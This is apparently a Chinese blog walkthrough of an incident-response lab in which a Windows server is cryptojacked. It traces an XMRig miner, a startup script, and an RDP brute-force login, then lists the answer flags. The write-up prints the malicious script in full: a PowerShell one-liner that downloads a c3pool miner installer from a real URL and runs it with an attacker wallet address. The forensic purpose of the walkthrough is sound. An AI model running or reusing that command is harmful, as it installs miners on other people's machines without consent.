应急响应靶机训练 - 挖矿
应急响应靶机训练 - 挖矿
机房运维小陈,下班后发现还有工作没完成,然后上机器越用越卡,请你帮他看看原因。
请你找出以下内容作为通关条件:
- 攻击者的 IP 地址;
- 攻击者开始攻击的时间;
- 攻击者攻击的端口;
- 挖矿程序的 MD5;
- 后门脚本的 MD5;
- 矿池的 URL;
- 钱包的 URL;
- 攻击者入侵流程;
相关账户密码:
Administrator/zgsf@123
1 流程梳理
[!Note]
这里推荐使用 RDP 远程连接服务器,因为 近源 OS1 靶机没有安装 VMTools,操作不是很方便。
根据题意说是被挖矿了,那难免会出现异常进程、CPU 占用过高的情况,打开任务管理器看看:
发现个 XMRig miner 的程序(这里是开机没有,我自己启动的,所以占用小),没见过,感觉挺特殊。
用火绒剑跟一下,看着好像挺正常的:
用火绒剑看看启动项,发现个 system.bat 脚本,那这就不正常了:
跟过去打开看看:
哦豁,确实是个恶意脚本,大致就是去矿池下载挖矿程序了:
1 | powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.bat', $tempfile); & $tempfile 4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y; Remove-Item -Force $tempfile" |
丢到微步沙箱去:
那就没错了,访问一下矿池的地址(https://c3pool.org):
下面还有个钱包地址:
根据脚本上的 URL 分析,xmrig 就是挖矿程序了:
挖矿这块搞定了,那攻击者是怎么入侵进来的呢?服务器上没有 Web、FTP 等外部服务,那大概率就是 RDP 了。
看看 RDP 连接日志,是否存在爆破行为:
还真有,攻击者 192.168.115.131 在 2024-05-21 20:25:22 开始了爆破,看看后续是否登录成功了:
看日志是爆破成功了,进入了服务器。
2 总结
Flag 如下:
- 攻击者的 IP 地址:192.168.115.131
- 攻击者开始攻击的时间:2024-05-21 20:25:22
- 攻击者攻击的端口:3389
- 挖矿程序的 MD5:A79D49F425F95E70DDF0C68C18ABC564
- 后门脚本的 MD5:8414900F4C896964497C2CF6552EC4B9
- 矿池的 URL:
https://c3pool.org - 钱包的 URL:
4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y - 攻击者入侵流程:RDP 爆破 -> 执行 system.bat 文件 -> 执行挖矿程序
相关推荐
2025-12-19
应急响应靶机训练 - Web1
应急响应靶机训练 - Web1小李在值守的过程中,发现有 CPU 占用飙升,出于胆子小,就立刻将服务器关机,并找来正在吃苕皮的 hxd 帮他分析,这是他的服务器系统,请你找出以下内容,并作为通关条件: 攻击者的 Shell 密码; 攻击者的 IP 地址; 攻击者的隐藏账户名称; 攻击者挖矿程序的矿池域名; 相关账户密码:administrator/Zgsf@admin.com 1 Flag-1由于服务器之前关过,这里需要先启动 Web 服务: 使用浏览器访问一下: 目前站点看不出入侵痕迹,根据要求可知,攻击者在站点下存在 WebShell。 打开 Web 根目录: 肉眼肯定看不出来,直接去看日志(C:\phpstudy_pro\Extensions\Apache2.4.39\logs),由于日志非常大,使用 Notepad++ 打开。经过查找发现在 2024-02-26 22:46:23 时出现了 shell.php 的访问记录: [!Warning] 这里正常说应该是看 Nginx 的,但实际是看 Apache 的。 拼接一下 shell.php 路径: 1C:...
2025-12-21
应急响应靶机训练 - Linux1
应急响应靶机训练 - Linux1小王急匆匆地找到小张,小王说 “李哥,我 dev 服务器被黑了”,快救救我!!。请你找出以下内容作为通关条件: 黑客的 IP 地址; 黑客遗留下的 3 个 flag; 该靶机有很多非预期解,做靶机是给自己做,请大家合理按照预期解进行探索。相关账户密码: defend/defend root/defend 1 流程梳理在 Linux 中最普遍的就是 SSH 登录了,可以使用 last 看看最近的用户登录情况: 123456789101112[defend@localhost ~]$ lastdefend pts/0 :0 Sun Dec 21 22:44 still logged in defend :0 :0 Sun Dec 21 22:44 still logged in reboot system boot 3.10.0-1160.el7. Sun Dec 21 22:44 - 22:44 (00:00) ...
2025-12-22
应急响应靶机训练 - Linux2
应急响应靶机训练 - Linux2看监控的时候发现 Webshell 告警,领导让你上机检查,你可以救救安服仔吗!!。 请你找出以下内容作为通关条件: 黑客的 IP 地址; 黑客修改的管理员密码(明文); 黑客留下的 WebShell 连接密码; 黑客后续上传的木马文件名称; 黑客遗留下的 3 个 flag; 该靶机有很多非预期解,做靶机是给自己做,请大家合理按照预期解进行探索。相关账户密码: root/Inch@957821. 1 流程梳理 [!Note] 这里推荐使用 SSH 远程连接服务器,因为 Linux2 靶机没有 GUI 界面,操作不是很方便。 在 Linux 中最普遍的就是 SSH 登录了,可以使用 last 看看最近的用户登录情况: 可以看到 192.168.20.1 在 2024-03-20 有个连接,看看登录失败的记录: 翻一翻 secure 日志: 1cat /var/log/secure | grep '192.168.20.1' 不够这点信息也不能确定是否是攻击者,查看 root 的历史命令: 12345678910111213141...
2025-12-20
应急响应靶机训练 - Web2
应急响应靶机训练 - Web2小李在某单位驻场值守,深夜 12 点,甲方已经回家了,小李刚偷偷摸鱼后,发现安全设备有告警,于是立刻停掉了机器开始排查。这是他的服务器系统,请你找出以下内容,并作为通关条件: 攻击者的 IP 地址(两个); 攻击者的 Webshell 文件名; 攻击者的 Webshell 密码; 攻击者的伪 QQ 号; 攻击者的伪服务器 IP 地址; 攻击者的服务器端口; 攻击者的隐藏用户名; 攻击者是如何入侵的; 相关账户密码:administrator/Zgsf@qq.com 1 日志分析由于服务器之前关过,这里需要先启动 Web 服务,使用浏览器访问 Web 页面: 一眼 WordPress,看页面正常,直接去看日志文件,使用 Notepad++ 打开(C:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1709164800): 经查看 192.168.126.135 在 2024-02-29 12:35:10 访问了站点,在 2024-02-29 12:38:30 进行了目录扫描操作。 接着...
2025-12-24
应急响应靶机训练 - 近源 OS1
应急响应靶机训练 - 近源 OS1小王从某安全大厂被优化掉后,来到了某私立小学当起了计算机老师。某一天上课的时候,发现鼠标在自己动弹,又发现除了某台电脑,其他电脑连不上网络。感觉肯定有学生捣乱,于是开启了应急。 请你找出以下内容作为通关条件: 攻击者的外网 IP 地址; 攻击者的内网跳板 IP 地址; 攻击者使用的限速软件的 MD5 大写; 攻击者的后门 MD5 大写; 攻击者留下的 flag; 该靶机有很多非预期解,做靶机是给自己做,请大家合理按照预期解进行探索。相关账户密码: Administrator/zgsf@2024 1 流程梳理 [!Note] 这里推荐使用 RDP 远程连接服务器,因为 近源 OS1 靶机没有安装 VMTools,操作不是很方便。 这次的靶机有点奇怪,我看 WP 理不出思路,不过有个取巧、简便的方法。 下个火绒!,直接开扫: 可以发现在 “学校放假通知 - 练习.doc” 里面有个宏病毒,直接扔到微步云沙箱里分析一下: 发现了攻击者的 VPS(可能)地址 8.219.200.130: 再往下,分析说 php_xmlrpc.dll 是一...
2025-12-21
应急响应靶机训练 - Web3
应急响应靶机训练 - Web3小苕在省护值守中,在灵机一动情况下把设备停掉了,甲方问:为什么要停设备?小苕说:我第六感告诉我,这机器可能被黑了。请你找出以下内容作为通关条件: 攻击者的两个 IP 地址; 隐藏用户名称;hack6618$ 黑客遗留下的 3 个 flag; 本虚拟机的考点不在隐藏用户以及 IP 地址,相关账户密码:administrator/xj@123456 1 日志分析由于服务器之前关过,这里需要先启动 Web 服务,使用浏览器访问 Web 页面: 根据页面提示这是个 Z-Blog 建站,看页面正常,直接去看日志文件,使用 Notepad++ 打开(D:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1710201600): 根据日志内容发现,攻击者 192.168.75 在 2025.03.12 11:06:58 访问站点,之后访问了 /zb_system/login.php 页面。在网页中打开,发现是后台登录页面: 接着往下看,发现频繁出现 /zb_system/cmd.php?act=v...
